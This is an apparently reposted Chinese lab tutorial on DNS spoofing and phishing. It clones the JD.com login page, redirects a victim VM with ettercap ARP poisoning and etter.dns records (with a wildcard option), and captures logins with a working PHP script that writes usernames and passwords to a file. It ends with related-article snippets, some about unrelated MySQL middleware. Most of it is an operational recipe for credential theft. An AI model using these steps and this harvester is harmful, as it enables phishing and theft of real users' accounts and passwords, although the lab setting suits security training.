DNS欺骗与钓鱼网站

article/2025/9/23 16:37:13

实验背景

钓鱼者运用社会工程学只是诱骗受害者,以未授权情况下获取对方的姓名、年龄、邮箱账号、甚至是银行卡密码等私人信息。

钓鱼往往呵社会工程学结合进行诱导,而社会工程学时黑客的内功,能否灵活运用可以体现一个黑客的个人修为,所以说防人之心不可无。

社会工程学黑客常见伎俩:

  • 电话号码欺骗
  • 利用坏消息作案
  • 滥用网民对社交等网络的信任
  • 二维码引诱

实验目标

使用kali系统模拟攻击者,利用中间人攻击手段来对受害者进行DNS欺骗、使受害者通过访问假的京东网站,来获取用户登录的用户名与密码

实验原理

实验流程

 打开三台虚拟机

打开win2003的DNS服务器

 

打开正向区域右键建立解析文件jd.com,无脑下一步直到写区域名称

 继续无脑下一步就完成了

 在jd.com中右键新建主机

 ip地址为win2003服务器的地址

买了一级域名二级域名就可以不花钱

例如:

www.sina.com

mp3.sina.com

sina买了,前边可以随便变动

打开IIS新建一个网站jd

 IP为本地IP

 先来扒个jd的网页

打开京东官网登录页面

鼠标右键--->网页另存为---->保存到本地

 将jd文件拖进win2003,放在D盘

 (静态网页)

继续添加网站

 

静态网页,读取权限即可

 添加index.html

 将其移动到最上面

在winxp访问jd.com

失败力

打开网络连接属性设置

 此时win2003是DNS服务器所以应该将DNS服务器的IP写为win2003的IP

在winxp中再次手工解析,成功了,jd的地址为192.168.71.129 

在winxp中用域名访问jd网站(好怪,,,)

 ​​​​​

打开kali进行配置,输入命令进行ettercap配置

vim /etc/ettercap/etter.dns

i键为写入模式 

写入这两条指令

www.jd.com A 192.168.71.130
www.jd.com PTR 192.168.71.130

A  称为正向解析

PTR  是反向解析

解析方向:

 

 为了实验的成功性,因为许多系统会反向验证,所以多写一条

 如果再恨亿点,可以用*取代www.jd.com,这样无论你问什么域名攻击者都会告诉你这就是192.168.71.130 

 退出vim编辑器

先按Esc,再按:最下面出现如下界面,

 输入wq回车即可退出

 开启apache

输入如下命令

systemctl start apache2

 没提示就成功了

接下来进行验证,查看其端口是否开放

netstat -antql

 查看到一个80端口,是apache2,处于监听状态

apache默认站点路径

 /var目录主要存放可变文件,像日志,缓存等

键入如下命令

cd /var/www/html/

发现有一些网页,把这些删了 

输入命令删除,不要输错了!!!!!

rm -rf *

 加工一个jd假网站,能够在用户登录时实现一个信息收集

F12查看网页代码,再按ctrl+f搜form找到这一行

 

 将下边代码的account改为loginname,passwd改为nloginpwd

<?php
$nam = stripslashes($_POST['account']);
$pas = stripslashes($_POST['passwd']);
$content = "你已捕获京东账号及密码1个:" . "用户名 " . $nam . "密码" . $pas;
$filed = @fopen("1.txt" , "a+");
@fwrite($filed, "$content\n");?>
<html>
<head><script type = "text/javascript">function goBack(){window.history.back()  //后退+刷新)</script>
</head>
<body onload = "goBack()">   <!--加载之后立即执行一段 JavaScript -->
</body>
</html>

先将网站拖进kali(注意一下有没有少文件,多拖几次)

 使用命令将jd这个文件夹复制到/var/www/html/下

 查看文件权限

ls -l

 更改文件权限

chmod 777 1.txt

到此为止网站就做好了

kali开始攻击

打开ettercap,在终端行输入命令

ettercap -G

ettercap扫描到两台主机

设定目标1和目标2

点击ARP Poisoning

 

点击ok

 这只是arp欺骗无法进行投毒

在菜单栏选择plugins----->选择manage plugins

出现如下界面

 双击打开,伪装DNS服务器进行欺骗

 先在xp中清理缓存

输入命令

ipconfig /flushdns

使用vim编辑index.html文件

将此处改为action=“error.php”

在xp中登录jd账号

 查看kali中1.txt捕获的信息

 


http://chatgpt.dhexx.cn/article/C8b6jxvM.shtml

相关文章

DNS欺骗的艺术 | 域名劫持和网页挂马

0x00 免责声明 本文仅限于学习讨论与技术知识的分享&#xff0c;不得违反当地国家的法律法规。对于传播、利用文章中提供的信息而造成的任何直接或者间接的后果及损失&#xff0c;均由使用者本人负责&#xff0c;本文作者不为此承担任何责任&#xff0c;一旦造成后果请自行承担…

DNS欺骗原理及工作工程分析

DNS欺骗 DNS欺骗是这样一种中间人攻击形式&#xff0c;它是攻击者冒充域名服务器的一种欺骗行为&#xff0c;它主要用于向主机提供错误DNS信息&#xff0c;当用户尝试浏览网页&#xff0c;例如IP地址为XXX.XX.XX.XX &#xff0c;网址为www.bankofamerica.com&#xff0c;而实际…

DNS内网欺骗(仅供参考)

DNS内网欺骗(仅供参考) 下面展示一些 内联代码片。 //启动apche2 systemctl start apache2 在/var/www/html/目录下添加index.html访问页面//修改文件 leafpad /etc/ettercap/etter.dns//添加一下内容 * A 192.168.1.34 * PTR 192.168.1.34 *.*.com A 192.168.1.34 //* 表…

DNS 欺骗原理

DNS欺骗 DNS欺骗是这样一种中间人攻击形式&#xff0c;它是攻击者冒充域名服务器的一种欺骗行为&#xff0c;它主要用于向主机提供错误DNS信息&#xff0c;当用户尝试浏览网页&#xff0c;例如IP地址为XXX.XX.XX.XX &#xff0c;网址为www.bankofamerica.com&#xff0c;而实际…

DNS欺骗实验过程和分析

目录 1、实验准备 2、实验图 3、配置DNS转发器 4、DNS欺骗环境 1、实验准备 win10和server均设置为桥接模式&#xff0c;将win10的DNS指向server win10:192.168.223.165 server&#xff1a;192.168.223.245 2、实验图 3、配置DNS转发器 此时win可以nslookup 4、DNS欺骗…

DNS欺骗原理

简而言之就是&#xff1a;用伪装的DNS服务器截获请求域名的IP&#xff0c;再发送给伪装的web服务器。查询特定域名的IP时&#xff0c;将得到伪造的IP&#xff0c;打开事先准备好的虚假页面

如何防护DNS欺骗攻击

除了CC攻击、DDoS攻击&#xff0c;还有一种DNS欺骗攻击也是经常常见的&#xff0c;那什么是DNS欺骗攻击呢&#xff1f;它的原理是什么&#xff1f;该如何防御&#xff1f; DNS欺骗攻击&#xff0c;属于DNS攻击中的一种&#xff0c;DNS欺骗就是攻击者在域名解析请求的过程中冒充…

DNS欺骗攻击及如何防护

域名系统(Domain Name System,DNS)是一个将Domain Name和IP Address进行互相映射的Distributed Database。DNS是网络应用的基础设施&#xff0c;它的安全性对于互联网的安全有着举足轻重的影响。但是由于DNS Protocol在自身设计方面存在缺陷&#xff0c;安全保护和认证机制不健…

DNS欺骗

DNS欺骗 本文仅供学习参考&#xff0c;切勿在真实环境下操作&#xff01;不听话的出现后果和我没关系&#xff01;&#xff01;! 文章目录 DNS欺骗实验目的实验原理环境准备操作步骤最后的最后 实验目的 kali Linux下用Ettercap在局域网中使用DNS欺骗 实验原理 有一个欺骗者…

DNS欺骗实验

实验准备&#xff1a; 三台虚拟机&#xff0c;Kali&#xff0c;win10&#xff0c;win2016 servers。 一、实验环境搭建 设置Kali Linux主机、Windows Server 2016服务器与Windows 10在同一可以上网的网段。我们就整个简单的&#xff0c;把三个虚拟机都桥接。接下来我教大家…

网络安全基础——DNS欺骗

本人声明整个过程完全是为了进行实验学习&#xff0c;并没有侵犯任何人的权益 DNS原理 实质是域名解析协议&#xff0c;&#xff0c;假设一企业员工上班浏览网页&#xff0c;他会在浏览器里输入http://www.xxxxxx.com这个网站域名&#xff0c;输入之后他的电脑并不知道这是个…

DNS解析过程及欺骗原理

什么是DNS DNS即地址解析协议&#xff0c;域名系统以分布式数据库的形式将域名和IP地址相互映射。 解析过程&#xff1a; 假如我们要访问 www.baidu.com &#xff0c;首先要向本地DNS服务器发出DNS请求&#xff0c;查询 www.baidu.com 的IP地址&#xff1b; 如果本地DNS服务器…

网络安全入门学习第十课——DNS欺骗

文章目录 一、DNS概念1、DNS是什么&#xff1f;2、DNS欺骗是什么&#xff1f; 二、DNS欺骗复现1、环境&#xff1a;2、使用工具&#xff1a;3、开始复现3.1、开启攻击者的web服务3.2、修改/etc/ettercap/etter.dns3.3、启动ettercap&#xff0c;配置目标3.4、开始攻击3.5、检查…

网络攻防技术——DNS欺骗

一、题目 本实验的目标是让学生获得对DNS&#xff08;域名系统&#xff09;的各种攻击的第一手经验。DNS是互联网的电话簿&#xff1b;它将主机名转换为IP地址&#xff0c;反之亦然。这种转换是通过DNS解析实现的&#xff0c;这种解析发生在幕后。DNS欺骗攻击以各种方式操纵此…

DNS欺骗-教程详解

目录 一、环境 二、dns欺骗原理 三、dns欺骗操作 四、dns欺骗的危害 五、dns欺骗的防御 一、环境 VMware下的kali&#xff08;攻击机&#xff09;、Windows 7 x64&#xff08;目标机&#xff09; kali下载链接&#xff1a; https://blog.csdn.net/Stupid__Angel/articl…

cetus权限连接主从mysql_cetus/cetus-rw.md at master · eimens/cetus · GitHub

Cetus 读写分离版使用指南 简介 Cetus 读写分离版将前端发来的读请求和写请求分别发送到不同的服务器后端&#xff0c;由于底层的数据库都是Master/Slave架构&#xff0c;做到读写分离能大大提高数据库的处理能力。 安装部署 准备 1. MySQL 搭建MySQL主从关系 若开启主从延迟检…

网易中间件Cetus开源啦

Cetus的诞生 网易电商近年来业务呈现爆发式增长,原架构环境下,数据库的性能和吞吐量已无法应对其带来的巨大压力,为彻底解决数据库的瓶颈,Cetus应运而生。Cetus由网易乐得专家技术团队领队,经多部门协调合作设计出来的优秀中间件。具有正统基因,基于官方MySQL Proxy的版…

031:Cetus sharding

目录 一、主机环境二、搭建环境 1、准备环境三、Cetus安装 1、下载包和安装依赖包2、Cetus安装 1.安装说明2.安装实施四、Cetus配置 1、创建和修改配置文件2、启动cetus3、导入数据4、验证cetus分库功能五、Cetus测试各种限制 1、JOIN的使用限制2、DISTINCT的限制3、CASE WHEN/…

cetus权限连接主从mysql_网易开源中间件 -Cetus监控模块

01 概述 本文主要对Cetus的监控模块的使用及原理进行介绍&#xff0c;并介绍Cetus使用过程中&#xff0c;监控模块常见的问题及解决方法。 Cetus监控模块拥有独立的监控线程&#xff0c;主要是对Cetus后端各个MySQL实例进行监控&#xff0c;监控的内容主要包括三方面&#xff1…

cetus(cetus talk)

Cetus公司于1991年退出什么&#xff1f; Cetus公司于1991年推出一种rTthReverseTran&#xff0d;scriptase,有很好的依赖于RNA的耐热DNA聚合酶活性和依赖于DNA的耐热DNA聚合酶活性&#xff0c;二种活性分别依赖于Mn2Mg2&#xff0c;这样就可分别控制酶活性 Cetus公司于1991年退…